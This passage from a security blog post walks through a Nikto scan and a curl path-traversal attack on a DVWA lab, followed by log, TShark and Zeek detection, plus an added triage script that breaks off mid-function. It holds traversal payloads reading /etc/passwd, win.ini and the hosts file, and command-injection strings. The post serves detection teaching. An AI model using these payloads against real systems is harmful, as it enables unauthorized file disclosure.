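    return [r["sid"] for r in map(parse_rule, rule_texts) if rule_matches(r, uri)]


if __name__ == "__main__":
    for name, req in [("sqli", SQLI_REQUEST), ("cmd", CMD_REQUEST),
                      ("reordered", REORDERED_REQUEST), ("benign", BENIGN_REQUEST)]:
        print(f"{name:10} {alerts_for(req)}  {request_uri(req)}")
```

The SQL injection URI from the earlier payload satisfies both 2006445 (SELECT then FROM) and 2006446 (UNION then SELECT), and the cmd.exe payload satisfies only 2009361. Without the <i>distance:0</i> on the second content, 2006445 would also fire on the reordered request, which is the false-positive class the relative match is there to remove.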
</div><div><br /></div><div>Nothing meaningful left here to review.</div></div></div><div><br /></div><div><div><b>Hope you enjoyed the posts in this series:</b></div><div><div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-scanning-for.html" target="_blank">Beginning Nikto - Scanning for interesting files seen in the logs</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-misconfiguration.html" target="_blank">Beginning Nikto - Misconfiguration / Default File - with evasion type 1 -> Random URI encoding (non-UTF8)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Information Disclosure with evasion type 2 -> Directory self-reference (/./)</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Injection (XSS/Script/HTML) - with evasion type 3 -> Premature URL ending</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-information-disclosure.html" target="_blank">Beginning Nikto - Command Execution / Remote Shell</a> </div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - SQL Injection with default evasion</a></div><div>- <a href="https://www.securitynik.com/2023/12/beginning-nikto-sql-injection-with.html" target="_blank">Beginning Nikto - File Upload Vulnerability testing</a></div></div><div><br /></div></div></div>Nik Alleyne, MSc | CISSP | 
GC|IA|IH|REM|PENhttp://www.blogger.com/profile/10282323977269843041noreply@blogger.com0tag:blogger.com,1999:blog-7303400454979750101.post-78104038516991653832023-12-12T18:27:00.000-08:002023-12-12T18:44:34.417-08:00Beginning Nikto - Remote File Retrieval with evasion type 4 -> Prepend long random string<p>This post is part of the series of learning more about Nikto and web application scanning from the perspectives of both the <a href="https://www.amazon.com/Learning-Practicing-Leveraging-Practical-Detection/dp/1731254458" target="_blank">hack and its detection</a>. </p><p>From the hacking perspective, Nikto is the tool used. From the detection perspective, the tools and/or processes used for the network forensics are log analysis, TShark, Zeek and Suricata.<br /><br /></p><p><span style="font-size: medium;"><b>The Hack - Remote File Retrieval with evasion type 4 -> Prepend long random string</b></span></p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ nikto -host http://10.0.0.106 -ipv4 -Display 1 --ask no -Format json -o /tmp/nikto.json -nossl -no404 -Tuning 5 -evasion 4</span>
<span style="color: white;">- Nikto v2.5.0</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">+ Target IP: 10.0.0.106</span>
<span style="color: white;">+ Target Hostname: 10.0.0.106</span>
<span style="color: white;">+ Target Port: 80</span>
<span style="color: white;">+ Using Encoding: Prepend long random string</span>
<span style="color: white;">+ Start Time: 2023-06-06 15:13:18 (GMT-4)</span>
<span style="color: white;">---------------------------------------------------------------------------</span>
<span style="color: white;">...</span>
<span style="color: white;">+ /index.php?download=/winnt/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?download=/windows/win.ini - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?download=/etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Snif 1.2.4 allows any file to be retrieved from the web server.</span>
<span style="color: white;">+ /index.php?|=../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , Portix-PHP Portal allows retrieval of arbitrary files via the '..' type filtering problem.</span>
<span style="color: white;">+ /index.php?page=../../../../../../../../../../etc/passwd - Redirects (302) to http://10.0.0.106/dashboard/ , The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host. (probably Rocket, but could be any index.php)</span>
<span style="color: white;">...</span>
<span style="color: white;">+ 925 requests: 0 error(s) and 6 item(s) reported on remote host</span>
<span style="color: white;">+ End Time: 2023-06-06 15:13:20 (GMT-4) (2 seconds)</span>
<span style="color: white;">---------------------------------------------------------------------------</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Everything above shows <i>302</i>. Hence I'm concluding this test was not successful.</p><p>Besides, we already learned previously that <i>index.php</i> does not have a parameter named "<i>page</i>" and there is none named "<i>download</i>". More importantly, <i>/etc/passwd</i> is found on Linux, not Windows, so those results are not valid for this purpose.</p><p>I will leverage my knowledge of the DVWA app to actually exploit this. Rather than using the web application directly, I will use curl to attempt to read the <i>"c:\windows\system32\drivers\etc\hosts"</i> file.</p><p>If we inspect the page, we see a "<i>page</i>" parameter. By default, the value is "<i>include.php</i>":</p><p><i>http://10.0.0.106/dvwa/vulnerabilities/fi/?page=include.php</i></p><p>Using curl:</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ curl --request GET --location "http://10.0.0.106/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts" </span>
<span style="color: #fcff01;"><b><span># Copyright (c) 1993-2009 Microsoft Corp.</span>
<span># ...</span>
<span># Additionally, comments (such as these) may be inserted on individual</span>
<span># lines or following the machine name denoted by a '#' symbol.</span>
<span>#</span>
<span># For example:</span>
<span>#</span>
<span># 102.54.94.97 rhino.acme.com # source server</span>
<span># 38.25.63.10 x.acme.com # x client host</span>
<span># localhost name resolution is handled within DNS itself.</span>
<span># 127.0.0.1 localhost</span>
<span># ::1 localhost</span>
<span>10.0.0.107 mycooldomain.cdw</span></b></span>
<span style="color: white;"><!DOCTYPE html></span>
<span style="color: white;"><html lang="en-GB"></span>
<span style="color: white;"> <head></span>
<span style="color: white;"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /></span>
<span style="color: white;"> <title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title></span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>We can see above, just before the original page loads, the text from the hosts file.</div><div><br /></div><div>Transitioning to log analysis.</div></div><p><span style="font-size: medium;"><b>Detect - Log Analysis</b></span></p><p>Looking at the first entry in the access.log, we see a large set of random characters prepended to the request.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | head -1</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:49 -0400] "GET /P4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmvP4JTD9bmSV1pmv/../ HTTP/1.1" 302 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
<p></p><p>Looking for something meaningful: entries where the response code is 200.</p><p><!--HTML generated using hilite.me--></p><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\s+200\s+"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:50 -0400] "GET /0RHy...JUNK...EkwGH/../favicon.ico HTTP/1.1" 200 30894 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "OPTIONS * HTTP/1.1" 200 - "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
<span style="color: white;">10.0.0.107 - - [06/Jun/2023:15:12:51 -0400] "TRACE /eaXa8sc4...JUNK...Wlt5N/../ HTTP/1.0" 200 721 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"</span>
</pre></div>
<p></p><p>Nothing meaningful above. What else is there?</p><p>Looking at the paths. How many were there?</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">sort --unique | awk --field-separator="HTTP" '{ print $1 }' | wc --lines </span>
<span style="color: white;">667</span>
</pre></div>
</div><div><br /></div><div>Getting a snapshot of some of these.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat access.log | grep --perl-regexp "\.\..*?HTTP" --only-matching | sort --unique | \</span></pre><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">awk --field-separator="HTTP" '{ print $1 }' </span>
<span style="color: white;">./0.alz </span>
<span style="color: white;">../0.cer </span>
<span style="color: white;">../0.egg</span>
<span style="color: white;">...</span>
<span style="color: white;">../autohtml.php?op=modload&mainfile=x&name=/etc/passwd </span>
<span style="color: white;">../backup.alz </span>
<span style="color: white;">...</span>
<span style="color: white;">./cgi-bin/generate.cgi?content=../../../../../../../../../../etc/passwd%00board=board_1 </span>
<span style="color: white;">../cgi-bin/generate.cgi?content=../../../../../../../../../../windows/win.ini%00board=board_1 </span>
<span style="color: white;">../cgi-bin/generate.cgi?content=../../../../../../../../../../winnt/win.ini%00board=board_1 </span>
<span style="color: white;">../cgi-bin/guestbook.cgi </span>
<span style="color: white;">../cgi-bin/helpdesk.cgi </span>
<span style="color: white;">../cgi-bin/hsx.cgi?show=../../../../../../../../../../../etc/passwd%00 </span>
<span style="color: white;">../cgi-bin/htgrep?file=index.html&hdr=/etc/passwd </span>
<span style="color: white;">../cgi-bin/htmlscript?../../../../../../../../../../etc/passwd </span>
<span style="color: white;">../cgi-bin/htsearch?exclude=%60/etc/passwd%60 </span>
<span style="color: white;">...</span>
<span style="color: white;">../cgi-bin/input2.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\ </span>
<span style="color: white;">../cgi-bin/input.bat?|dir%20..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\</span>
<span style="color: white;">...</span>
<span style="color: white;">./magento/magmi-importer/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility </span>
<span style="color: white;">../magento/magmi-importer/web/download_file.php?file=../../app/etc/local.xml </span>
<span style="color: white;">../magento/magmi-importer/web/download_file.php?file=../../../../../../../../../../../etc/passwd </span>
<span style="color: white;">../magento/magmi/web/ajax_pluginconf.php?file=../../../../../../../../../../../etc/passwd&plugintype=utilities&pluginclass=CustomSQLUtility </span>
<span style="color: white;">...</span>
</pre></div>
</div><div><br /></div><div><div>Moving on to what an actual attack looks like. As we already know from above, there were only 2 entries that returned response code 200.</div><div><br /></div><div>What does the log look like for an actual successful attack?</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">10.0.0.107 - - [07/Jun/2023:14:36:24 -0400] "GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1" 200 4005 "-" "curl/7.88.1"</span>
</pre></div>
</div><div><br /></div><div><div>At this point, we need to review the system to see if that file exists. If it does, then you have to wonder what information was exposed. Do note, all systems tend to have a <i>hosts</i> file, and Windows definitely has it in that location. Maybe the packet analysis will help to add more clarity.</div></div><div><br /></div><div><br /></div><div><b><span style="font-size: medium;">Detect - Packet Analysis</span></b></div><div><br /></div><div><div>Setup for packet analysis: capture packets on ports 80 and 443.</div><div><br /></div><div>Get the streams where the response code was 200.</div></div><div><br /></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ tshark -n -r tuning_5.pcap -Y 'http.response.code == 200' -T fields -e ip.src -e ip.dst -e tcp.srcport -e tcp.stream -e tcp.len -E header=y </span>
<span style="color: white;">ip.src ip.dst tcp.srcport tcp.stream tcp.len</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 4 549</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 8 187</span>
<span style="color: white;">10.0.0.106 10.0.0.107 80 9 0</span><span style="font-family: Times New Roman;"><span style="white-space: normal;">
</span></span></pre></div>
</div><p>Looking at stream 4, we see it is the <i>favicon</i>.</p><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span>└─$ tshark -n -r tuning_5.pcap -q -z follow,tcp,ascii,4 | grep --perl-regexp "\s+200\s+" --before-context=7 --after-context=10 </span>
<span style="font-weight: bold;">GET</span> <span>/0RHy...JUNK...kwGH/../favicon.ico</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">Connection</span><span>:</span> <span>Keep-Alive</span>
1460
HTTP/1.1 200 OK
Date: Tue, 06 Jun 2023 19:12:50 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
Last-Modified: Thu, 16 Jul 2015 15:32:32 GMT
ETag: "78ae-51affc7a4c400"
Accept-Ranges: bytes
Content-Length: 30894
Keep-Alive: timeout=5, max=48
Connection: Keep-Alive</span>
Content-Type: image/x-icon
</pre></div>
</div><div><br /></div><div>Detecting the actual attack via packet analysis</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span><span style="color: white;">
</span><span style="color: white;">└─$ tshark -n -r fi.pcap </span><span style="color: white;">
</span><span style="color: white;"> 1 0.000000000 10.0.0.107 → 10.0.0.106 TCP 74 59456 → 80 [SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=1949226976 TSecr=0 WS=128</span><span style="color: white;">
</span><span style="color: white;"> 2 0.000252977 10.0.0.106 → 10.0.0.107 TCP 66 80 → 59456 [SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1460 WS=256 SACK_PERM</span><span style="color: white;">
</span><span style="color: white;"> 3 0.000288567 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=1 Ack=1 Win=64256 Len=0</span><span style="color: white;">
</span><span style="color: white;"> 4 0.000369486 10.0.0.107 → 10.0.0.106 HTTP 210 GET /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts HTTP/1.1 </span><span style="color: white;">
</span><span style="color: white;"> 5 0.009548711 10.0.0.106 → 10.0.0.107 TCP 1514 </span><span style="color: #fcff01;"><span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span> <span style="font-weight: bold;">200</span></span><span style="color: white;"> </span><span style="color: white;">OK [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">6 0.009548962 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=1461 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">7 0.009548998 10.0.0.106 → 10.0.0.107 TCP 1514 80 → 59456 [ACK] Seq=2921 Ack=157 Win=2102272 Len=1460 [TCP segment of a reassembled PDU]</span><span style="color: white;">
</span><span style="color: white;">8 0.009549028 10.0.0.106 → 10.0.0.107 HTTP 125 HTTP/1.1 200 OK (text/html)</span><span style="color: white;">
</span><span style="color: white;">9 0.009599451 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=1461 Win=64128 Len=0</span><span style="color: white;">
</span><span style="color: white;">10 0.009615795 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=2921 Win=63488 Len=0</span><span style="color: white;">
</span><span style="color: white;">11 0.009623869 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4381 Win=62592 Len=0</span><span style="color: white;">
</span><span style="color: white;">12 0.009635647 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=157 Ack=4452 Win=62592 Len=0</span><span style="color: white;">
</span><span style="color: white;">13 0.011856522 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [FIN, ACK] Seq=157 Ack=4452 Win=64128 Len=0</span><span style="color: white;">
</span><span style="color: white;">14 0.012227611 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [ACK] Seq=4452 Ack=158 Win=2102272 Len=0</span><span style="color: white;">
</span><span style="color: white;">15 0.012227889 10.0.0.106 → 10.0.0.107 TCP 60 80 → 59456 [FIN, ACK] Seq=4452 Ack=158 Win=2102272 Len=0</span><span style="color: white;">
</span><span style="color: white;">16 0.012271428 10.0.0.107 → 10.0.0.106 TCP 54 59456 → 80 [ACK] Seq=158 Ack=4453 Win=64128 Len=0</span>
</pre></div>
</div><div><br /></div><div>How many conversations were part of this communication?</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ tshark -n -r fi.pcap -q -z conv,tcp</span>
<span style="color: white;">================================================================================</span>
<span style="color: white;">TCP Conversations</span>
<span style="color: white;">Filter:<No Filter></span>
<span style="color: white;"> | <- | | -> | | Total | Relative | Duration |</span>
<span style="color: white;"> | Frames Bytes | | Frames Bytes | | Frames Bytes | Start | |</span>
<span style="color: white;">10.0.0.107:59456 <-> 10.0.0.106:80 7 4,853 bytes 9 662 bytes 16 5,515 bytes 0.000000000 0.0123</span>
<span style="color: white;">================================================================================</span>
</pre></div>
</div><div><br /></div><div><div>Following stream <i>0</i>.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;"><span>┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span>└─$ tshark -n -r fi.pcap -q -z follow,tcp,ascii,0</span>
<span>===================================================================</span>
<span>Follow: tcp,ascii</span>
<span>Filter: tcp.stream eq 0</span>
<span>Node 0: 10.0.0.107:59456</span>
<span>Node 1: 10.0.0.106:80</span>
<span>156</span>
<span style="font-weight: bold;">GET</span> <span>/dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts</span> <span style="font-weight: bold;">HTTP</span><span>/</span><span style="font-weight: bold;">1.1</span>
<span style="font-weight: bold;">Host</span><span>:</span> <span>10.0.0.106</span>
<span style="font-weight: bold;">User-Agent</span><span>:</span> <span>curl/7.88.1</span>
<span style="font-weight: bold;">Accept</span><span>:</span> <span>*/*</span>
1460
HTTP/1.1 200 OK
Date: Wed, 07 Jun 2023 18:36:24 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.0.28
X-Powered-By: PHP/8.0.28
Set-Cookie: security=low; path=/
Set-Cookie: PHPSESSID=vba6pa2had7c86op2lnluit7v5; expires=Thu, 08-Jun-2023 18:36:24 GMT; Max-Age=86400; path=/
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4005
Content-Type: text/html;charset=utf-8
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
#.127.0.0.1 localhost
#.::1 localhost
10.0.0.107 mycooldomain.cdw</span>
<!DOCTYPE html>
</pre></div>
</div><div><br />The packet analysis confirms our log analysis findings. The file was successfully retrieved, hence we see the full contents above. As we say in the <a href="https://www.sans.org/cyber-security-courses/network-monitoring-threat-detection/" target="_blank">SANS SEC503 - Network Monitoring and Threat Detection</a> - <b><i>Packets or it did not happen</i></b>. This is clear evidence of that.</div><div><br /></div><div>Transitioning to Zeek.</div><div><b><span style="font-size: medium;"><br /></span></b></div><div><b><span style="font-size: medium;">Detect - Zeek Analysis</span></b></div><div><br /></div><div><div>Setup Zeek.</div></div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/zeek_stuff]</span>
<span style="color: white;">└─$ sudo zeek --iface any --no-checksums</span>
</pre></div>
</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat http.log | grep --perl-regexp "\s+200\s+" | head --lines=1 </span>
<span style="color: white;">1686078799.407770 C0NrKC2wb8TbvK0iZb 10.0.0.107 39234 10.0.0.106 80 53 GET 10.0.0.106 /0RHy...JUNK...wGH/../favicon.ico - 1.1 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 - 0 30894 200 OK - - (empty) - - - - - - F0bkFD4SgqIlRoiaQf - image/x-icon</span>
</pre></div>
</div><div><br /></div><div>Looking at the actual attack traffic, we see something similar to what we saw in our log analysis of the <i>access.log</i> file.</div><div><br /></div><div><!--HTML generated using hilite.me--><div style="background: rgb(17, 17, 17); border-color: gray; border-image: initial; border-style: solid; border-width: 0.1em 0.1em 0.1em 0.8em; border: solid gray; overflow: auto; padding: 0.2em 0.6em; width: auto;"><pre style="line-height: 125%; margin: 0px;"><span style="color: white;">┌──(kali㉿securitynik)-[~/nikto_stuff/tuning_5]</span>
<span style="color: white;">└─$ cat http.log </span>
<span style="color: white;">1686163005.810950 C7ccD83WRZobza0Lj9 10.0.0.107 59456 10.0.0.106 80 1 GET 10.0.0.106 /dvwa/vulnerabilities/fi/?page=../../../../../../windows/system32/drivers/etc/hosts - 1.1 curl/7.88.1 - 0 4005 200 OK </span>
</pre></div>
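<p>The <i>access.log</i> triage above and the Zeek <i>http.log</i> check just shown ask the same two questions by hand: which requests carry a <i>..</i> traversal (or Nikto's evasion-4 junk prefix followed by <i>/../</i>), and which of those came back with a 200 and a body for a sensitive file. The script below is an added example that automates both over either log format; it is not Nikto's, Zeek's or the author's code. The sample log lines are constructed to resemble the output shown in this post, and the Zeek column order is assumed to be the stock <i>http.log</i> layout (confirm it against the <i>#fields</i> header of your own log).</p>

```python
"""Triage Apache access.log and Zeek http.log for traversal that succeeded.
Added example for this post, not Nikto's, Zeek's or the author's code. Sample
lines are constructed to resemble the post's output; the Zeek column order is
the stock http.log layout (an assumption: confirm with your log's #fields line).
"""
import posixpath
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import unquote

# Apache combined format: client ident user [time] "request" status size "referer" "ua"
APACHE_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]+" '
                       r'(?P<status>\d{3}) (?P<size>\S+) "[^"]*" "[^"]*"$')
# Stock Zeek http.log columns (assumption: check the #fields line of your log).
ZEEK_FIELDS = ["ts", "uid", "id.orig_h", "id.orig_p", "id.resp_h", "id.resp_p", "trans_depth",
               "method", "host", "uri", "referrer", "version", "user_agent", "origin",
               "request_body_len", "response_body_len", "status_code", "status_msg", "info_code",
               "info_msg", "tags", "username", "password", "proxied", "orig_fuids", "orig_filenames",
               "orig_mime_types", "resp_fuids", "resp_filenames", "resp_mime_types"]
JUNK_PREFIX_RE = re.compile(r"^/[A-Za-z0-9]{32,}/\.\./")  # Nikto evasion 4: junk segment, then climb out
DOTDOT_RE = re.compile(r"(?:^|[/=])\.\.(?:/|$)")           # ".." as a segment in a path or query value
SENSITIVE = ("/etc/passwd", "/etc/hosts", "/win.ini", "/boot.ini", "/local.xml")


@dataclass
class Finding:
    client: str
    status: int
    size: int
    raw_target: str
    normalized_path: str   # "/JUNK/../favicon.ico" collapses to "/favicon.ico"
    evasion_prefix: bool   # junk-prefix signature present in the path
    path_traversal: bool   # ".." in the path component
    query_traversal: bool  # ".." in a query value (the DVWA page= case)
    sensitive: bool        # names one of the SENSITIVE files
    succeeded: bool        # 200 with a non-empty body


def parse_apache(line: str) -> Optional[Dict]:
    m = APACHE_RE.match(line.rstrip("\n"))
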